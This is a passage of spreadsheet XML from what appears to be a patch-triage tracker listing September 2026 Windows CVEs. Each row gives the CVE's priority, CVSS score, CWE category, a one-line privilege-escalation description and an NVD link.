t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q518" s="5" t="inlineStr" /><c r="R518" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S518" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t></is></c></row><row r="519"><c r="A519" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C519" s="5" t="inlineStr"><is><t>CVE-2026-69455</t></is></c><c r="D519" s="5" t="n"><v>7.8</v></c><c r="E519" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F519" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G519" s="5" t="inlineStr" /><c r="H519" s="5" t="n"><v>0.003</v></c><c r="I519" s="5" t="inlineStr" /><c r="J519" s="5" t="inlineStr" /><c r="K519" s="5" t="inlineStr" /><c r="L519" s="5" t="inlineStr" /><c r="M519" s="5" t="inlineStr" /><c r="N519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P519" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q519" s="5" t="inlineStr" /><c r="R519" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S519" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t></is></c></row><row r="520"><c r="A520" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C520" s="5" t="inlineStr"><is><t>CVE-2026-69456</t></is></c><c r="D520" s="5" t="n"><v>7.8</v></c><c r="E520" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F520" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G520" s="5" t="inlineStr" /><c r="H520" s="5" t="n"><v>0.003</v></c><c r="I520" s="5" t="inlineStr" /><c r="J520" s="5" t="inlineStr" /><c r="K520" s="5" t="inlineStr" /><c r="L520" s="5" t="inlineStr" /><c r="M520" s="5" t="inlineStr" /><c r="N520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P520" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q520" s="5" t="inlineStr" /><c r="R520" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S520" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t></is></c></row><row r="521"><c r="A521" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C521" s="5" t="inlineStr"><is><t>CVE-2026-69459</t></is></c><c r="D521" s="5" t="n"><v>7.8</v></c><c r="E521" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F521" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G521" s="5" t="inlineStr" /><c r="H521" s="5" t="n"><v>0.003</v></c><c r="I521" s="5" t="inlineStr" /><c r="J521" s="5" t="inlineStr" /><c r="K521" s="5" t="inlineStr" /><c r="L521" s="5" t="inlineStr" /><c r="M521" s="5" t="inlineStr" /><c r="N521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P521" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q521" s="5" t="inlineStr" /><c r="R521" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S521" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t></is></c></row><row r="522"><c r="A522" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C522" s="5" t="inlineStr"><is><t>CVE-2026-69467</t></is></c><c r="D522" s="5" t="n"><v>7.8</v></c><c r="E522" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F522" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G522" s="5" t="inlineStr" /><c r="H522" s="5" t="n"><v>0.003</v></c><c r="I522" s="5" t="inlineStr" /><c r="J522" s="5" t="inlineStr" /><c r="K522" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L522" s="5" t="inlineStr" /><c r="M522" s="5" t="inlineStr" /><c r="N522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q522" s="5" t="inlineStr" /><c r="R522" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S522" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t></is></c></row><row r="523"><c r="A523" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C523" s="5" t="inlineStr"><is><t>CVE-2026-69475</t></is></c><c r="D523" s="5" t="n"><v>7.8</v></c><c r="E523" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F523" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G523" s="5" t="inlineStr" /><c r="H523" s="5" t="n"><v>0.003</v></c><c r="I523" s="5" t="inlineStr" /><c r="J523" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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23" s="5" t="inlineStr" /><c r="M523" s="5" t="inlineStr" /><c r="N523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P523" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q523" s="5" t="inlineStr" /><c r="R523" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S523" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t></is></c></row><row r="524"><c r="A524" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C524" s="5" t="inlineStr"><is><t>CVE-2026-69476</t></is></c><c r="D524" s="5" t="n"><v>7.8</v></c><c r="E524" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F524" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G524" s="5" t="inlineStr" /><c r="H524" s="5" t="n"><v>0.003</v></c><c r="I524" s="5" t="inlineStr" /><c r="J524" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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24" s="5" t="inlineStr" /><c r="M524" s="5" t="inlineStr" /><c r="N524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P524" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q524" s="5" t="inlineStr" /><c r="R524" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S524" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t></is></c></row><row r="525"><c r="A525" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C525" s="5" t="inlineStr"><is><t>CVE-2026-69478</t></is></c><c r="D525" s="5" t="n"><v>7.8</v></c><c r="E525" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G525" s="5" t="inlineStr" /><c r="H525" s="5" t="n"><v>0.003</v></c><c r="I525" s="5" t="inlineStr" /><c r="J525" s="5" t="inlineStr" /><c r="K525" s="5" t="inlineStr" /><c r="L525" s="5" t="inlineStr" /><c r="M525" s="5" t="inlineStr" /><c r="N525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q525" s="5" t="inlineStr" /><c r="R525" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S525" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t></is></c></row><row r="526"><c r="A526" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C526" s="5" t="inlineStr"><is><t>CVE-2026-69480</t></is></c><c r="D526" s="5" t="n"><v>7.8</v></c><c r="E526" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F526" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G526" s="5" t="inlineStr" /><c r="H526" s="5" t="n"><v>0.003</v></c><c r="I526" s="5" t="inlineStr" /><c r="J526" s="5" t="inlineStr" /><c r="K526" s="5" t="inlineStr" /><c r="L526" s="5" t="inlineStr" /><c r="M526" s="5" t="inlineStr" /><c r="N526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P526" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q526" s="5" t="inlineStr" /><c r="R526" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S526" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t></is></c></row><row r="527"><c r="A527" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C527" s="5" t="inlineStr"><is><t>CVE-2026-69489</t></is></c><c r="D527" s="5" t="n"><v>7.8</v></c><c r="E527" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F527" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G527" s="5" t="inlineStr" /><c r="H527" s="5" t="n"><v>0.003</v></c><c r="I527" s="5" t="inlineStr" /><c r="J527" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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27" s="5" t="inlineStr" /><c r="M527" s="5" t="inlineStr" /><c r="N527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P527" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q527" s="5" t="inlineStr" /><c r="R527" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S527" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t></is></c></row><row r="528"><c r="A528" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C528" s="5" t="inlineStr"><is><t>CVE-2026-69508</t></is></c><c r="D528" s="5" t="n"><v>7.8</v></c><c r="E528" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F528" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G528" s="5" t="inlineStr" /><c r="H528" s="5" t="n"><v>0.003</v></c><c r="I528" s="5" t="inlineStr" /><c r="J528" s="5" t="inlineStr" /><c r="K528" s="5" t="inlineStr" /><c r="L528" s="5" t="inlineStr" /><c r="M528" s="5" t="inlineStr" /><c r="N528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q528" s="5" t="inlineStr" /><c r="R528" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S528" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t></is></c></row><row r="529"><c r="A529" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C529" s="5" t="inlineStr"><is><t>CVE-2026-69509</t></is></c><c r="D529" s="5" t="n"><v>7.8</v></c><c r="E529" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F529" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G529" s="5" t="inlineStr" /><c r="H529" s="5" t="n"><v>0.003</v></c><c r="I529" s="5" t="inlineStr" /><c r="J529" s="5" t="inlineStr" /><c r="K529" s="5" t="inlineStr" /><c r="L529" s="5" t="inlineStr" /><c r="M529" s="5" t="inlineStr" /><c r="N529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P529" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q529" s="5" t="inlineStr" /><c r="R529" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S529" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t></is></c></row><row r="530"><c r="A530" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C530" s="5" t="inlineStr"><is><t>CVE-2026-69513</t></is></c><c r="D530" s="5" t="n"><v>7.8</v></c><c r="E530" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F530" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G530" s="5" t="inlineStr" /><c r="H530" s="5" t="n"><v>0.003</v></c><c r="I530" s="5" t="inlineStr" /><c r="J530" s="5" t="inlineStr" /><c r="K530" s="5" t="inlineStr" /><c r="L530" s="5" t="inlineStr" /><c r="M530" s="5" t="inlineStr" /><c r="N530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P530" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q530" s="5" t="inlineStr" /><c r="R530" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S530" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t></is></c></row><row r="531"><c r="A531" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C531" s="5" t="inlineStr"><is><t>CVE-2026-69528</t></is></c><c r="D531" s="5" t="n"><v>7.8</v></c><c r="E531" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F531" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G531" s="5" t="inlineStr" /><c r="H531" s="5" t="n"><v>0.003</v></c><c r="I531" s="5" t="inlineStr" /><c r="J531" s="5" t="inlineStr" /><c r="K531" s="5" t="inlineStr" /><c r="L531" s="5" t="inlineStr" /><c r="M531" s="5" t="inlineStr" /><c r="N531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P531" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q531" s="5" t="inlineStr" /><c r="R531" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S531" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t></is></c></row><row r="532"><c r="A532" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C532" s="5" t="inlineStr"><is><t>CVE-2026-69532</t></is></c><c r="D532" s="5" t="n"><v>7.8</v></c><c r="E532" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F532" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G532" s="5" t="inlineStr" /><c r="H532" s="5" t="n"><v>0.003</v></c><c r="I532" s="5" t="inlineStr" /><c r="J532" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53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32" s="5" t="inlineStr" /><c r="M532" s="5" t="inlineStr" /><c r="N532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P532" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q532" s="5" t="inlineStr" /><c r="R532" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S532" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t></is></c></row><row r="533"><c r="A533" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C533" s="5" t="inlineStr"><is><t>CVE-2026-69534</t></is></c><c r="D533" s="5" t="n"><v>7.8</v></c><c r="E533" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F533" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G533" s="5" t="inlineStr" /><c r="H533" s="5" t="n"><v>0.006</v></c><c r="I533" s="5" t="inlineStr" /><c r="J533" s="5" t="inlineStr" /><c r="K533" s="5" t="inlineStr" /><c r="L533" s="5" t="inlineStr" /><c r="M533" s="5" t="inlineStr" /><c r="N533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P533" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q533" s="5" t="inlineStr" /><c r="R533" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S533" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t></is></c></row><row r="534"><c r="A534" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C534" s="5" t="inlineStr"><is><t>CVE-2026-69535</t></is></c><c r="D534" s="5" t="n"><v>7.8</v></c><c r="E534" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F534" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G534" s="5" t="inlineStr" /><c r="H534" s="5" t="n"><v>0.002</v></c><c r="I534" s="5" t="inlineStr" /><c r="J534" s="5" t="inlineStr" /><c r="K534" s="5" t="inlineStr" /><c r="L534" s="5" t="inlineStr" /><c r="M534" s="5" t="inlineStr" /><c r="N534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P534" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q534" s="5" t="inlineStr" /><c r="R534" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S534" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t></is></c></row><row r="535"><c r="A535" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C535" s="5" t="inlineStr"><is><t>CVE-2026-69538</t></is></c><c r="D535" s="5" t="n"><v>7.8</v></c><c r="E535" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F535" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G535" s="5" t="inlineStr" /><c r="H535" s="5" t="n"><v>0.002</v></c><c r="I535" s="5" t="inlineStr" /><c r="J535" s="5" t="inlineStr" /><c r="K535" s="5" t="inlineStr" /><c r="L535" s="5" t="inlineStr" /><c r="M535" s="5" t="inlineStr" /><c r="N535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P535" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q535" s="5" t="inlineStr" /><c r="R535" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S535" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t></is></c></row><row r="536"><c r="A536" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C536" s="5" t="inlineStr"><is><t>CVE-2026-69541</t></is></c><c r="D536" s="5" t="n"><v>7.8</v></c><c r="E536" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F536" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G536" s="5" t="inlineStr" /><c r="H536" s="5" t="n"><v>0.003</v></c><c r="I536" s="5" t="inlineStr" /><c r="J536" s="5" t="inlineStr" /><c r="K536" s="5" t="inlineStr" /><c r="L536" s="5" t="inlineStr" /><c r="M536" s="5" t="inlineStr" /><c r="N536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q536" s="5" t="inlineStr" /><c r="R536" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S536" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t></is></c></row><row r="537"><c r="A537" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C537" s="5" t="inlineStr"><is><t>CVE-2026-69542</t></is></c><c r="D537" s="5" t="n"><v>7.8</v></c><c r="E537" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F537" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G537" s="5" t="inlineStr" /><c r="H537" s="5" t="n"><v>0.002</v></c><c r="I537" s="5" t="inlineStr" /><c r="J537" s="5" t="inlineStr" /><c r="K537" s="5" t="inlineStr" /><c r="L537" s="5" t="inlineStr" /><c r="M537" s="5" t="inlineStr" /><c r="N537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P537" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q537" s="5" t="inlineStr" /><c r="R537" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S537" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t></is></c></row><row r="538"><c r="A538" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C538" s="5" t="inlineStr"><is><t>CVE-2026-69544</t></is></c><c r="D538" s="5" t="n"><v>7.8</v></c><c r="E538" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F538" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G538" s="5" t="inlineStr" /><c r="H538" s="5" t="n"><v>0.003</v></c><c r="I538" s="5" t="inlineStr" /><c r="J538" s="5" t="inlineStr" /><c r="K538" s="5" t="inlineStr" /><c r="L538" s="5" t="inlineStr" /><c r="M538" s="5" t="inlineStr" /><c r="N538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P538" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q538" s="5" t="inlineStr" /><c r="R538" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S538" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t></is></c></row><row r="539"><c r="A539" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C539" s="5" t="inlineStr"><is><t>CVE-2026-69561</t></is></c><c r="D539" s="5" t="n"><v>7.8</v></c><c r="E539" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F539" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G539" s="5" t="inlineStr" /><c r="H539" s="5" t="n"><v>0.003</v></c><c r="I539" s="5" t="inlineStr" /><c r="J539" s="5" t="inlineStr" /><c r="K539" s="5" t="inlineStr" /><c r="L539" s="5" t="inlineStr" /><c r="M539" s="5" t="inlineStr" /><c r="N539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P539" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q539" s="5" t="inlineStr" /><c r="R539" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S539" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t></is></c></row><row r="540"><c r="A540" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C540" s="5" t="inlineStr"><is><t>CVE-2026-69571</t></is></c><c r="D540" s="5" t="n"><v>7.8</v></c><c r="E540" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F540" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G540" s="5" t="inlineStr" /><c r="H540" s="5" t="n"><v>0.003</v></c><c r="I540" s="5" t="inlineStr" /><c r="J540" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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40" s="5" t="inlineStr" /><c r="M540" s="5" t="inlineStr" /><c r="N540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P540" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q540" s="5" t="inlineStr" /><c r="R540" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S540" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t></is></c></row><row r="541"><c r="A541" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C541" s="5" t="inlineStr"><is><t>CVE-2026-69576</t></is></c><c r="D541" s="5" t="n"><v>7.8</v></c><c r="E541" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F541" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G541" s="5" t="inlineStr" /><c r="H541" s="5" t="n"><v>0.003</v></c><c r="I541" s="5" t="inlineStr" /><c r="J541" s="5" t="inlineStr" /><c r="K541" s="5" t="inlineStr" /><c r="L541" s="5" t="inlineStr" /><c r="M541" s="5" t="inlineStr" /><c r="N541" s="5" 